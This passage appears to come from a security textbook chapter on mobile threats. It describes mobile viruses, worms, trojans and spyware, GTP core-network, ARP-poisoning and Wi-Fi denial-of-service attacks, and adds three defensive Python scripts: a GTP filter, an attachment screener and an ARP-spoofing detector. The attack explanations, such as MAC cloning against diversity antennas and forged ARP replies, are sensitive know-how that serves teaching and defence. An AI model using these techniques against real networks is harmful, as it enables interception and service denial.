identity, it allows the attacker to increase the number of targets.
4. Gain access to account information - In some areas, cell phones
are becoming capable of performing certain transactions (from
paying for parking or groceries to conducting larger financial
transactions). An attacker who can gain access to a phone that
is used for these types of transactions may be able to discover
your account information and use or sell it.
CELL PHONE SECURITY TIPS
1. Follow general guidelines for protecting portable devices - Take
precautions to secure your cell phone and PDA the same way you
should secure your computer.
2. Be careful about posting your cell phone number and email
address - Attackers often use software that browses web sites for
email addresses. These addresses then become targets for attacks
and spam. Cell phone numbers can be collected automatically, too.
By limiting the number of people who have access to your
information, you limit your risk of becoming a victim.
3. Do not follow links sent in email or text messages - Be suspicious
of URLs sent in unsolicited email or text messages. While the links
may appear to be legitimate, they may actually direct you to a
malicious web site.
4. Be wary of downloadable software - There are many sites that offer
games and other software you can download onto your cell phone
or PDA. This software could include malicious code. Avoid
downloading files from sites that you do not trust. If you are
getting the files from a supposedly secure site, look for a web site
certificate. If you do download a file from a web site, consider
saving it to your computer and manually scanning it for viruses
before opening it.
5. Evaluate your security settings - Make sure that you take
advantage of the security features offered on your device. Attackers
may take advantage of Bluetooth connections to access or
download information on your device. Disable Bluetooth when you
are not using it to avoid unauthorized access.
6. Guard your cell phone like you would your wallet.
7. Password-protect your device.
8. Don't rely on cell phone insurance to cover the consequences of a
loss: it may replace the handset, but not the data on it or the misuse
of your service while the phone is in someone else's hands.
9. Call your cell phone provider as soon as you discover the loss, so
that the SIM and the handset's IMEI can be blocked.
10. File a police report.
22.5 Mobile Related Threats
So far, mobile security threats have been a relatively minor annoyance to
a handful of users in Europe and Asia. Even though the risk of catching a
virus on your cell phone is still relatively small, it is increasing
continuously as the use of e-mail and the Internet on cell phones grows.
This applies in North America too, where conditions for these threats are
ripening as rapidly as in the rest of the world.
The threat is becoming real
Attacks on cell phones rose fivefold in 2006, with clients of 83 percent of
mobile operators around the world having been hit, and experts agree
that 2007 will likely be the year when mobile viruses become more than
a theoretical problem. Several reports and predictions by experts indicate
that criminals increasingly will target Smartphone and PDA devices as
data moves to these devices. The rapid evolution of mobile viruses means
they will pose a major threat in the future.
In the spring of 2007 a mobile antivirus firm demonstrated this trend.
The company took a standard Nokia 6330 mobile phone to British high
streets and shopping centres, and opened up the device to mobile phone
viruses simply by turning on its Bluetooth receiver or downloading files
via MMS, SMS or e-mail. During a 28-day period the phone was infected 7
times by 5 types of virus.
Serious damage
Since the first mobile virus appeared in 2004, the number of different
viruses, worms or other type of mobile malware has now reached about
400 and the number is set to double by the end of 2007 as virus writers
are creating new ways to attack cell phone software. Mobile hackers
already have a large number of attack vectors. A mobile device can
become infected via download, via sharing memory cards with other
devices, via MMS, SMS or email, and via Bluetooth.
The damage that mobile viruses can do is also very diverse. The most
dangerous viruses can render a phone useless or steal money from users
through pricey messages or calls to unwanted numbers without the
user's knowledge. Other mobile malware is able to steal all data from a
phone, listen in on calls, monitor MMS and SMS messages, and track the
phone owner's movements.
The mobile communication network is exposed to many security threats,
just like any other data network, and these threats are real and
potentially very harmful. The problems listed below are specific to the
mobile packet core: the SGSN and GGSN nodes, the GTP tunnels between
them, and the Gi interface towards the Internet.
Capturing a subscriber’s data session
Spoofed SGSN or GGSN
Spoofed Create PDP Context Request
Spoofed Update PDP Context Request
Overbilling Attacks
Border Gateway bandwidth saturation
DNS Flood
GTP Flood
Spoofed GTP PDP Context Delete
DNS Cache Poisoning
Gi bandwidth saturation
Application Layer attacks from Handsets
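The list above names the threats but does not show what a defender at the Gn/Gp border would actually check. The following Python script is an added example, not code from this book: it parses the mandatory GTPv1 header (version, message type, length and TEID, as laid out in 3GPP TS 29.060) and applies a simple border policy that drops anything malformed or off the GTP-C port, honours Create/Update/Delete PDP Context Requests only from a configured list of trusted SGSN addresses (which counters a spoofed SGSN and spoofed PDP context messages from arbitrary Internet hosts), and rate-limits any single source to blunt a GTP flood. The trusted address list, the threshold and the sample datagrams are constructed for the example.

```python
import struct
from collections import defaultdict, deque

GTP_C_PORT = 2123                      # GTP-C listens on UDP 2123 (GTP-U uses 2152)

# GTPv1-C message types from 3GPP TS 29.060
MSG_ECHO_REQUEST = 1
MSG_CREATE_PDP_REQ = 16
MSG_UPDATE_PDP_REQ = 18
MSG_DELETE_PDP_REQ = 20
SESSION_MSGS = {MSG_CREATE_PDP_REQ: "create-pdp",
                MSG_UPDATE_PDP_REQ: "update-pdp",
                MSG_DELETE_PDP_REQ: "delete-pdp"}


def parse_gtpv1_header(data: bytes):
    """Parse the mandatory 8-byte GTPv1 header (flags, type, length, TEID).
    Returns None unless the datagram is a well-formed GTPv1 message."""
    if len(data) < 8:
        return None
    flags, msg_type, length, teid = struct.unpack("!BBHI", data[:8])
    if flags >> 5 != 1:            # top three bits: protocol version, must be 1
        return None
    if length != len(data) - 8:    # length counts everything after the mandatory header
        return None
    return {"type": msg_type, "teid": teid, "length": length,
            "pt": bool(flags & 0x10),              # 1 = GTP, 0 = GTP' (charging)
            "ext_hdr": bool(flags & 0x04), "seq": bool(flags & 0x02),
            "npdu": bool(flags & 0x01)}


def build_gtpv1(msg_type: int, teid: int, payload: bytes = b"") -> bytes:
    """Minimal GTPv1-C datagram; used only to construct the sample traffic below."""
    flags = 0x30                   # version 1, PT = 1, no optional header fields
    return struct.pack("!BBHI", flags, msg_type, len(payload), teid) + payload


class GtpControlFilter:
    """Border policy for GTP-C on the Gp interface (constructed example):
    - anything not on the GTP-C port, or not well-formed GTPv1, is dropped;
    - each source may send at most max_msgs per window (blunts a GTP flood);
    - Create/Update/Delete PDP Context Requests are honoured only from known
      roaming-partner SGSN addresses (defeats spoofed SGSN / PDP context messages)."""

    def __init__(self, trusted_sgsns, max_msgs=50, window=1.0):
        self.trusted = set(trusted_sgsns)
        self.max_msgs = max_msgs
        self.window = window
        self.recent = defaultdict(deque)   # src_ip -> timestamps inside the window

    def _flooding(self, src_ip, now):
        q = self.recent[src_ip]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) > self.max_msgs

    def decide(self, src_ip, dst_port, data, now):
        if dst_port != GTP_C_PORT:
            return ("drop", "not-gtp-c")
        hdr = parse_gtpv1_header(data)
        if hdr is None or not hdr["pt"]:
            return ("drop", "malformed")
        if self._flooding(src_ip, now):
            return ("drop", "rate-limit")
        kind = SESSION_MSGS.get(hdr["type"], "type-%d" % hdr["type"])
        if hdr["type"] in SESSION_MSGS and src_ip not in self.trusted:
            return ("drop", "untrusted-sgsn:" + kind)
        return ("accept", kind)


def run_samples():
    """Feed constructed datagrams through the filter; returns the verdicts in order."""
    f = GtpControlFilter(trusted_sgsns={"10.20.0.5"})      # assumed roaming-partner SGSN
    verdicts = [
        f.decide("10.20.0.5", GTP_C_PORT, build_gtpv1(MSG_CREATE_PDP_REQ, 0), 0.00),
        f.decide("192.0.2.77", GTP_C_PORT, build_gtpv1(MSG_DELETE_PDP_REQ, 0x1A2B), 0.10),
        f.decide("10.20.0.5", GTP_C_PORT, b"\x48\x01\x00\x00", 0.20),   # truncated, version 2
        f.decide("10.20.0.5", 2152, build_gtpv1(MSG_ECHO_REQUEST, 0), 0.25),
    ]
    for i in range(60):   # 60 echo requests inside 60 ms from one host: a flood
        last = f.decide("198.51.100.9", GTP_C_PORT,
                        build_gtpv1(MSG_ECHO_REQUEST, 0), 0.3 + i * 0.001)
    verdicts.append(last)
    return verdicts


if __name__ == "__main__":
    for v in run_samples():
        print(v)
```

A real GTP firewall would also track the TEIDs handed out in Create PDP Context Responses so that a Delete PDP Context Request for a tunnel that was never created (the "spoofed GTP PDP Context Delete" in the list) can be rejected; that needs visibility of both directions of the exchange, which the stateless check above deliberately leaves out.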
Key mobile security concerns
1. Exposure of critical information: WLAN signals travel well beyond
the walls they are meant to serve, and anyone with a wireless sniffer
can capture them. A wireless intruder could expose critical
information if sufficient security isn't implemented.
2. Lost or stolen devices: Even if sufficient security is implemented
in wireless virtual private networks (VPNs), if a device is lost or
stolen, the entire corporate intranet could be threatened if those
devices aren't protected by password and other user-level security
measures.
3. Mobile viruses: Mobile viruses can be a major threat, particularly
with devices that have significant computational capabilities.
Mobile devices, in general, are susceptible to viruses in several
ways: viruses can take advantage of security holes in applications
or in the underlying operating system and cause damage;
applications or applets downloaded to a mobile device can be as
virus-prone as desktop applications; and, in some mobile OSs,
malformed SMS messages can crash the device. The so-called "911
virus" reportedly caused 13 million i-mode users' phones to
automatically dial Japan's emergency number.
4. E-mail viruses: E-mail viruses affect PDAs in much the same
way regular e-mail viruses affect PCs (for example, causing the PDA
e-mail program to send multiple e-mails). These viruses are costly to
enterprises and interrupt normal business. PalmOS/LibertyCrack is
an example: a Trojan horse, distributed by e-mail among other
channels, that deletes all applications on a Palm PDA once run.
5. Spam: Spam causes disruption and drives up costs when it's
targeted toward wireless devices.
22.6 Mobile Malwares
22.6.1 Mobile Viruses
A mobile phone virus is a computer virus specifically
adapted for the cellular environment and designed to
spread from one vulnerable phone to another.
Although mobile phone virus hoaxes have been
around for years, the so-called Cabir virus is the first
verified example. The virus was created by a group
from the Czech Republic and Slovakia called 29A,
which sent it to a number of security software
companies, including Symantec in the United States
and Kaspersky Lab in Russia. Cabir is considered a
"proof of concept" virus, because it proves that a
virus can be written for mobile phones, something that was once
doubted.
Cabir was developed for mobile phones running Symbian OS with the
Series 60 platform, and it spreads over Bluetooth. The virus searches
within Bluetooth range (about 10 metres for the class 2 radios used in
phones) for mobile phones in discoverable mode and sends itself,
disguised as a security file, to any vulnerable device. The virus only
becomes active if the recipient accepts the file and then installs it.
Once installed, the virus displays the word "Caribe" on the device's
display. Each time an infected phone is turned on, the virus launches
itself and scans the area for other devices to send itself to; the
constant scanning is likely to drain the phone's battery. Cabir can be
thought of as a hybrid virus/worm: its mode of distribution qualifies it
as a network worm, but it requires user interaction like a traditional
virus.
Cabir is not considered very dangerous, because it doesn't cause actual
damage, and because users can prevent infection by simply refusing to
accept suspicious files. However, the virus's code could be altered to
create more harmful malware that might, for example, delete any
information stored on phones it infects, or send out fake messages
purporting to be from the phone's owner.
Common mobile viruses
Cabir: Infects mobile phones running on Symbian OS. When a phone is
infected, the message 'Caribe' is displayed on the phone's display and is
displayed every time the phone is turned on. The worm then attempts to
spread to other phones in the area using wireless Bluetooth signals.
Duts: A parasitic file infector virus and is the first known virus for the
PocketPC platform. It attempts to infect all EXE files in the current
directory (infects files that are bigger than 4096 bytes)
Skulls: A Trojan horse. Once installed, it replaces all of the phone's
desktop icons with images of a skull and renders all phone applications,
including SMS and MMS, useless.
Commwarrior: First worm to use MMS messages in order to spread to
other devices. Can spread through Bluetooth as well. It infects devices
running under OS Symbian Series 60. The executable worm file once
launched hunts for accessible Bluetooth devices and sends the infected
files under a random name to various devices.
22.6.2 Mobile Worms
A worm is self-replicating malware that, unlike a
file-infecting virus, does not need to attach itself
to other files: it resides in active memory and
copies itself to other systems. Worms use parts of
an operating system that are automatic and
usually invisible to the user. It is common for
worms to be noticed only when their
uncontrolled replication consumes system
resources, slowing or halting other tasks.
Examples
Mabir Worm
Mabir worm spreads through Multimedia Messaging Service messages
(MMS) and it doesn't just send itself to numbers in a user’s phone book,
it also replies to any received messages. Mabir is essentially a
variant of the Cabir worm, which spreads only using Bluetooth.
Lasco.A
Lasco.A used Bluetooth and also infected .SIS files; in this respect it
differed from the Cabir.H worm. When a user opens the velasco.sis file
and chooses to install it, the worm activates and starts looking for new
devices to infect over Bluetooth. Files infected by Lasco.A would not be
sent to other devices automatically. Lasco.A could only reach mobile
phones that support Bluetooth and were in discoverable mode.
Commwarrior.Q
Commwarrior.Q will jump onto another phone using a short-range
Bluetooth wireless connection. It also spreads via MMS (multimedia
messaging service) or by an infected memory card inserted into a device.
Commwarrior.Q will continuously send MMS messages from midnight to
7 a.m. to people in an infected phone's address book. It cleverly
assembles a text message from the phone's "sent" file, making it appear
legitimate. After 7 a.m., however, Commwarrior.Q stops that action, as it
would be noticeable to the user. It then starts scanning other phones to
infect via Bluetooth. Commwarrior.Q will infect any Symbian OS
application installation files, called SIS files. Unlike its predecessors, the
SIS files that Commwarrior.Q infects take on random names, making
them harder to identify. Previous versions of Commwarrior used the
same file name. The SIS files also range in size from 32,100 to 32,200
bytes, making them hard to distinguish from ordinary MMS messages if
mobile operators wanted to filter them out of their networks.
Commwarrior.Q cannot infect a phone automatically, however: a user who
receives an infected SIS file is prompted and has to accept the file, and
then gets another security prompt. After that Commwarrior.Q starts
running. It does not damage data on the phone, but the user can incur
high phone charges from the messages the worm sends during the night.
Cabir.A
Cabir is a worm that replicates over Bluetooth connections. It arrives in
the phone's messaging inbox as a caribe.sis file that contains the worm.
When the user opens caribe.sis and chooses to install it, the worm
activates and starts looking for new devices to infect over Bluetooth.
When Cabir finds another Bluetooth device it starts sending infected SIS
files to it, and locks on to that phone so that it won't look for other
phones even when the target moves out of range.
Note that Cabir can reach only mobile phones that support Bluetooth and
are in discoverable mode, so setting your phone to non-discoverable
(hidden) Bluetooth mode protects it from Cabir. Once a phone is
infected, however, it will keep trying to infect other devices even as the
user tries to disable Bluetooth from the system settings.
22.6.3 Trojan Horse
A Trojan horse, or trojan for short, is a term used to describe malware
that appears, to the user, to perform a desirable function but in fact
facilitates unauthorized access to the user's computer system. The term
comes from the Trojan Horse story in Greek mythology. Trojan horses are
not self-replicating, which distinguishes them from viruses and worms.
Additionally, they usually require interaction with a hacker to fulfil
their purpose, and that hacker need not be the individual responsible
for distributing the Trojan horse: it is possible to scan computers on a
network with a port scanner in the hope of finding one with a Trojan
horse already installed and listening.
The term comes from the Greek story of the Trojan War, in which the
Greeks give a giant wooden horse to their foes, the Trojans, ostensibly as
a peace offering. But after the Trojans drag the horse inside their city
walls, Greek soldiers sneak out of the horse's hollow belly and open the
city gates, allowing their compatriots to pour in and capture Troy.
Operations which could be performed by a hacker on a target computer
system include:
1. Use of the machine as part of a Botnet (e.g. to perform Distributed
Denial-of-service (DDoS) attacks)
2. Data Theft (e.g. passwords, security codes, credit card information)
3. Installation of software (including other malware)
4. Downloading of files
5. Uploading of files
6. Deletion of files
7. Modification of files
8. Keystroke logging
9. Viewing the user's screen
10. Wasting computer space
Example of Trojan horse
An example of a Trojan horse attack is one that was reported in 1999:
This Trojan horse was distributed using email. Reports suggest that it
was widely distributed and that there were several versions. The email
sent to distribute the Trojan horse purported to be from Microsoft
Corporation and to offer a free upgrade for Microsoft Internet Explorer.
The email did not originate from Microsoft Corporation nor did it provide
an upgrade for Microsoft Internet Explorer. The Trojan horse was an
executable file named "ie0199.exe" and was provided as an email
attachment. One version of the email included the message:
As a user of the Microsoft Internet Explorer, Microsoft Corporation
provides you with this upgrade for your web browser. It will fix some
bugs found in your Internet Explorer. To install the upgrade, please save
the attached file (ie0199.exe) in some folder and run it. Once installed
the Trojan horse reportedly modified system files and attempted to
initiate contact with other remote systems.
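Both the MMS-borne worms described earlier (Commwarrior's SIS installers, which vary their names and sizes) and the ie0199.exe Trojan above rely on the recipient trusting what a file is called. A gateway check should look at the content instead. The following Python script is an added example and not code from this book: it recognises a Windows PE executable by its MZ stub and PE signature, a Symbian installer by its UID (0x10201A7A at the start of a Symbian 9 SIS file, UID3 0x10000419 at offset 8 in the older format; these UIDs are taken from the published format descriptions and are an assumption to verify against real samples), quarantines both regardless of the name they carry, and flags files whose extension disagrees with their content. The sample attachments are constructed stubs containing only the header bytes the checks look at.

```python
import os
import struct

PE_DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\x00\x00"
SIS_UID_SYMBIAN9 = 0x10201A7A   # UID1 of a Symbian OS 9.x SIS file (assumption: per published format)
SIS_UID_LEGACY = 0x10000419     # UID3 of a Symbian OS 6-8 SIS file (assumption: per published format)


def is_pe(data: bytes) -> bool:
    """Windows PE: 'MZ' DOS header, e_lfanew at offset 0x3C pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != PE_DOS_MAGIC:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def is_sis(data: bytes) -> bool:
    """Symbian installer of either generation, identified by its UIDs rather than its name."""
    if len(data) < 12:
        return False
    uid1, _uid2, uid3 = struct.unpack_from("<III", data, 0)
    return uid1 == SIS_UID_SYMBIAN9 or uid3 == SIS_UID_LEGACY


def classify(data: bytes) -> str:
    if is_pe(data):
        return "pe-executable"
    if is_sis(data):
        return "symbian-installer"
    if data[:3] == b"\xff\xd8\xff":          # JPEG SOI marker
        return "jpeg"
    return "unknown"


# Content types the gateway refuses outright, and the extensions each type may legitimately carry.
BLOCKED_TYPES = {"pe-executable", "symbian-installer"}
EXPECTED_EXT = {"pe-executable": {".exe", ".dll", ".scr"},
                "symbian-installer": {".sis", ".sisx"},
                "jpeg": {".jpg", ".jpeg"}}


def vet_attachment(filename: str, data: bytes):
    """Return (verdict, detail): quarantine known executables, flag name/content mismatches."""
    kind = classify(data)
    ext = os.path.splitext(filename.lower())[1]
    if kind in BLOCKED_TYPES:
        return ("quarantine", kind)
    if kind in EXPECTED_EXT and ext not in EXPECTED_EXT[kind]:
        return ("flag", "extension-mismatch:" + kind)
    return ("allow", kind)


# Constructed samples: only the header bytes that the checks above inspect.
def sample_pe() -> bytes:
    hdr = bytearray(PE_DOS_MAGIC + b"\x00" * 0x3A)   # 0x3C bytes of DOS header
    hdr += struct.pack("<I", 0x40)                    # e_lfanew -> PE header at 0x40
    hdr += PE_SIGNATURE + b"\x00" * 20
    return bytes(hdr)


def sample_sis() -> bytes:
    return struct.pack("<III", SIS_UID_SYMBIAN9, 0, 0) + b"\x00" * 20


def sample_jpeg() -> bytes:
    return b"\xff\xd8\xff\xe0" + b"\x00" * 28


def run_samples():
    return {
        "ie0199.exe": vet_attachment("ie0199.exe", sample_pe()),
        "holiday.jpg": vet_attachment("holiday.jpg", sample_pe()),   # executable hiding behind .jpg
        "caribe.sis": vet_attachment("caribe.sis", sample_sis()),
        "photo.jpg": vet_attachment("photo.jpg", sample_jpeg()),
        "photo.txt": vet_attachment("photo.txt", sample_jpeg()),
    }


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(name, verdict)
```

The point of checking content rather than names is exactly the one the Commwarrior.Q description makes: an attacker controls the file name and can pad the size, but cannot remove the header bytes the target platform needs to install or run the file.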
22.6.4 Mobile Spywares
Spyware is a type of malware that is installed on computers and that
collects information about users without their knowledge. The presence
of spyware is typically hidden from the user. Typically, spyware is
secretly installed on the user's personal computer. Sometimes, however,
spywares such as keyloggers are installed by the owner of a shared,
corporate, or public computer on purpose in order to secretly monitor
other users.
Mobile Viruses are becoming more common; so are many other security
threats to mobile devices and the data they hold.
Most recently, however, researchers have learned that hackers are now
creating mobile spyware, which manipulates SMS messages and allows
them to be read by others.
The spyware works like this:
A hacker sends an SMS message to the target. The target opens the
message, installing the spyware onto the device. That spyware,
unbeknownst to the victim, takes the SMS messages and forwards them
on to the hacker.
Mobile operators should be the most concerned because protecting
devices would cost them money, and a massive spyware outbreak could
also have a financial impact. In March, malware was found that copied
SMS messages and sent them to a server where they could be retrieved
by hackers. Then, in September, spyware was found that could retrieve
SMS messages, contact numbers and call logs. There is also mobile
malware that can call a device, make the device answer silently without
the user's knowledge, and turn the device into a remote bug.
22.6.5 Futuristic Threats
Mobile malware as it exists today does not present a significant risk to
the average mobile user, mainly because of the lack of potent mobile
malware in the wild. The following factors have kept mobile malware less
harmful:
1. Mobile devices did not store any critical information, so leaking or
erasing it was not lucrative for mobile malware developers.
2. Most of the mobile devices in use today are not programmable, or lack
processors capable of running applications. As a result, even though
the penetration of mobile devices is high, the number that can host
such malware is not very large.
Depending upon our study of the current technologies prevalent in the
mobile domain, the vulnerabilities present in them and the different
possibilities of attack, we could briefly categorize the futuristic threats in
the following categories.
22.7 Mobile Based Attacks
There are three main types of attacks against wireless networks: denial of
service attacks, man-in-the-middle attacks, and ARP poisoning attacks.
WEP key-cracking, which is often also considered an attack, is
introduced in this section and discussed in detail later.
22.7.1 Denial of Service (DoS) attacks
The objective of any denial of service attack is to prevent users from
accessing network resources -- to deny them service. The usual methods
of triggering DoS attacks are to flood a network with degenerate or faulty
packets, crowding out legitimate traffic and causing systems not to
respond.
Wireless systems are particularly susceptible to DoS attacks because of
the way different layers of the OSI stack interact with one another. First,
and perhaps most obviously, an attack on the "physical" layer of a
wireless network is much easier than an attack on the physical layer of
a wired network -- the physical layer is the air, the general vicinity around
a particular access point. Attackers don't need to gain access to your
internal corporate campus; they can simply drive by and begin their
attack from a car or even a nearby shop or restaurant, depending on how
your access points are laid out. It's also more difficult to discern whether
or not a physical DoS attack has occurred with a wireless network as
typically, there is no real evidence. An attacker can create a physical DoS
attack by manufacturing a device that will flood the 2.4 GHz spectrum
with noise and illegitimate traffic, a task that is not technically
complicated. Even some poorer quality cordless phones can cause
interference at 2.4 GHz, the band in which 802.11b/g wireless networks
operate.
At the data link layer of the OSI stack, again one can point out numerous
ways in which DoS attacks are simpler to launch against wireless
systems than against traditional wired networks. One of the most
common ways to mount an attack against the data link layer is through
the manipulation of diversity antennas. Here's how that might work: say
there is an access point, named AP, with diversity antennas A (for the left
side) and B (for the right). If user 1 and user 2 are on opposite sides of
the office, each user is by default served by a different antenna on the
access point. Herein lies the problem: if user 1 clones the MAC address of
user 2 and raises his signal strength until it at least equals user 2's,
the access point now associates that MAC address with user 1's antenna
and no longer sends or receives data from user 2. User 2 has been denied
service, and the attack was successful.
Spoofed access points are another problem at the data link layer on
wireless networks, even with WEP authentication. Clients are typically
configured to associate with the access point with the strongest signal.
An attacker can simply spoof the SSID (the name) of an access point and
clients will automatically associate with it and pass frames back and
forth. Here is where an attacker can capture traffic and, with time,
determine the WEP key used to authenticate and encrypt traffic on the
wireless network. WEP is cryptographically broken and offers no real
protection here; with WPA2 the four-way handshake cannot complete
unless the spoofed access point also knows the pre-shared key, and with
802.1X/EAP a client that validates the authentication server's
certificate will refuse a rogue network outright.
Finally, at the network layer, it's simple to flood a wireless network with
large ping requests or other unauthentic traffic once an attacker has
associated with a particular wireless access point.
22.7.2 Man-in-the-middle attacks
Similar to DoS attacks, man-in-the-middle attacks on a wireless network
are significantly easier to mount than against physical networks,
typically because such attacks on a wired network require some sort of
access to the network. Man-in-the-middle attacks take two common
forms: eavesdropping and manipulation.
In eavesdropping, an attacker simply listens to a set of transmissions to
and from different hosts even though the attacker's computer isn't party
to the transaction. Many relate this type of attack to a leak, in which
sensitive information could be disclosed to a third party without the
legitimate users' knowledge. Manipulation attacks build on the capability
of eavesdropping by taking this unauthorized receipt of a data stream
and changing its contents to suit a certain purpose of the attacker-
perhaps spoofing an IP address, changing a MAC address to emulate
another host, or some other type of modification.
To prevent an eavesdropping attack, one must encrypt the contents of a
data transmission at several levels, preferably using SSH, SSL, or IPsec.
Otherwise, large amounts of traffic containing private information are
passed through thin air, just waiting for an attacker to listen in and
collect the frames for further illegitimate analysis.
22.7.3 ARP poisoning
To understand an ARP poisoning attack, a bit of background on ARP
itself is needed. The Address Resolution Protocol lets hosts on an
Ethernet network that use TCP/IP discover which MAC address belongs to
a given IP address. Like NetBIOS it is a chatty protocol: to reach one
host, the sender broadcasts a request to every host on the segment
asking who is using a certain IP address. The host in question receives
that message and replies with its MAC address, and the originating
computer stores the responding computer's MAC address in its ARP cache,
so that further transmissions to that host don't require another lookup.
The problem is that ARP is stateless and unauthenticated. A computer
running Windows or Linux that receives an ARP reply (whether or not it
asked for one), or that sees the sender fields of an ARP request from a
particular machine, will assume that the MAC address in that packet
correctly corresponds to the IP address it claims, and will update its
cache accordingly. All future transmissions to that IP address then go to
the MAC address learned in this efficient but problematic way.
But what if an attacker sends forged ARP packets claiming that another
host's IP address belongs to his own computer's MAC address? Then all
transmissions from hosts that learn MAC/IP combinations this way will be
directed to the attacker's computer and not to the intended host, which
allows the attacker's computer to eavesdrop on communications and
possibly manipulate responses to deepen his attack.
This is certainly a serious problem. An attacker can get packets and
frames out of thin air by simply "poisoning" these local caches of MAC/IP
combinations on any two hosts connected to the physical network on
which an access point runs, and on a wireless LAN he does not even need
a physical connection to do so.
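The cache-update behaviour just described is exactly what a passive monitor such as arpwatch watches for. The following Python script is an added example, not code from this book: it parses Ethernet/ARP frames, keeps its own IP-to-MAC table, and raises an alert when a reply arrives for an address nobody recently asked about, when an address changes owner, or when the Ethernet source differs from the ARP sender hardware address. The victim, gateway and attacker addresses and the four frames are constructed for the example; on a real network the frames would come from a raw socket or a capture file.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def _mac_str(raw):   return ":".join("%02x" % b for b in raw)
def _ip_bytes(ip):   return bytes(int(o) for o in ip.split("."))
def _ip_str(raw):    return ".".join(str(b) for b in raw)


def build_arp_frame(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying one ARP packet (used to construct the samples)."""
    eth_dst = b"\xff" * 6 if oper == ARP_REQUEST else _mac_bytes(target_mac)
    eth = eth_dst + _mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)       # Ethernet, IPv4, hlen 6, plen 4
    arp += _mac_bytes(sender_mac) + _ip_bytes(sender_ip)
    arp += _mac_bytes(target_mac) + _ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return {"oper": oper, "eth_src": _mac_str(frame[6:12]),
            "sha": _mac_str(body[0:6]), "spa": _ip_str(body[6:10]),
            "tha": _mac_str(body[10:16]), "tpa": _ip_str(body[16:20])}


class ArpWatcher:
    """Passive ARP monitor: learns IP->MAC bindings and alerts on the signs of poisoning."""

    def __init__(self, request_window=2.0):
        self.table = {}         # ip -> mac last seen claiming it
        self.pending = {}       # ip asked for -> time of the last request for it
        self.window = request_window

    def observe(self, frame, now):
        pkt = parse_arp(frame)
        if pkt is None:
            return []
        alerts = []
        ip, mac = pkt["spa"], pkt["sha"]
        if pkt["eth_src"] != mac:                        # crafted frame: L2 source != ARP sender
            alerts.append(("header-mismatch", ip, pkt["eth_src"], mac))
        if pkt["oper"] == ARP_REQUEST:
            self.pending[pkt["tpa"]] = now
        elif pkt["oper"] == ARP_REPLY:
            asked = self.pending.pop(ip, None)
            if asked is None or now - asked > self.window:  # nobody asked: gratuitous or forged
                alerts.append(("unsolicited-reply", ip, mac))
        if ip == "0.0.0.0":                              # ARP probe (RFC 5227) claims no address
            return alerts
        old = self.table.get(ip)
        if old is not None and old != mac:               # binding flipped: the classic poisoning sign
            alerts.append(("changed-mapping", ip, old, mac))
        self.table[ip] = mac
        return alerts


def run_samples():
    """Constructed traffic: a normal request/reply, then a forged reply from a third host."""
    victim_mac, victim_ip = "aa:bb:cc:00:00:10", "192.168.1.10"
    gw_mac, gw_ip = "00:11:22:33:44:01", "192.168.1.1"
    attacker_mac = "de:ad:be:ef:00:66"
    w = ArpWatcher()
    frames = [
        (build_arp_frame(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip), 0.00),
        (build_arp_frame(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip), 0.01),
        (build_arp_frame(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip), 5.00),  # poison
        (b"\xff" * 6 + _mac_bytes(victim_mac) + struct.pack("!H", 0x0800) + b"\x45" + b"\x00" * 27, 5.10),
    ]
    return [w.observe(f, t) for f, t in frames]


if __name__ == "__main__":
    for alerts in run_samples():
        print(alerts)
```

The third frame is what the attack looks like on the wire: a reply that nobody requested, claiming the gateway's IP address for the attacker's MAC. A legitimate change of hardware also produces a "changed-mapping" alert, so in practice the monitor's output is reviewed rather than acted on automatically; static ARP entries or switch-level dynamic ARP inspection are the preventive controls.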
22.7.4 Bluetooth and Bluetooth based attacks
Bluetooth is an open wireless
protocol for exchanging data over
short distances from fixed and
mobile devices, creating personal
area networks (PANs). Bluetooth is a
high-speed, low-power microwave
wireless link technology, designed to
connect phones, laptops, PDAs and
other portable equipment together
with little or no work by the user. It
was originally conceived as a
wireless alternative to RS232 data
cables. It can connect several
devices, overcoming problems of
synchronization.
Bluetooth is the name for a short-range radio frequency (RF) technology
that operates in the 2.4 GHz band and is capable of transmitting voice
and data. The effective range of the class 2 radios found in phones is
about 32 feet (10 metres); class 1 radios, used in some laptops and
dongles, reach roughly 100 metres. The original Bluetooth 1.x radio
signals at 1 Mbps, and Bluetooth 2.0 with Enhanced Data Rate raised this
to 3 Mbps. The base specification was also published as IEEE 802.15.1.
It was invented to get rid of wires. Bluetooth is more suited to
connecting two devices point-to-point, whereas Wi-Fi is an IEEE
standard intended for networking.
i. List of applications
A typical Bluetooth mobile phone headset.
More prevalent applications of Bluetooth include:
Wireless control of and communication between a mobile phone
and a hands-free headset. This was one of the earliest applications
to become popular.
Wireless networking between PCs in a confined space and where
little bandwidth is required.
Wireless communication with PC input and
output devices, the most common being the
mouse, keyboard and printer.
Transfer of files, contact details, calendar
appointments, and reminders between
devices with OBEX.
Replacement of traditional wired serial
communications in test equipment, GPS
receivers, medical equipment, bar code
scanners, and traffic control devices.
For controls where infrared was traditionally used.
For low bandwidth applications where higher [USB] bandwidth is
not required and cable-free connection desired.
Sending small advertisements from Bluetooth-enabled advertising
hoardings to other, discoverable, Bluetooth devices.
Wireless bridge between two Industrial Ethernet (e.g., PROFINET)
networks.
Two seventh-generation game consoles, Nintendo's Wii and Sony's
PlayStation 3, use Bluetooth for their respective wireless
